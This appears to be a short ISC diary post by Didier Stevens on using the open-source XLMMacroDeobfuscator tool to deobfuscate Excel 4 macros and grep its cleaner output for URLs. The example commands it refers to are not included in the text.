XLMMacroDeobfuscator is an open-source tool to deobfuscate Excel 4 macros. I wrote diary entries about it here and here. In my first diary entry, I remark that I also had to install a missing Python module. This is no longer the case with the latest versions, I just install it with a single pip command. The author also commented on my diary entry, suggesting the use of a couple of options to yield a cleaner output ready for grepping. Like this: Indeed, this provides cleaner output when grepping for http URLs, for example: And this output can also be used to extract the relevant macros, with inverted greps for RUN, GOTO, ..., like this:
Didier Stevens |
DidierStevens 522 Posts ISC Handler Jun 1st 2020 |
Thread locked Subscribe |
Jun 1st 2020 7 months ago |
Sign Up for Free or Log In to start participating in the conversation!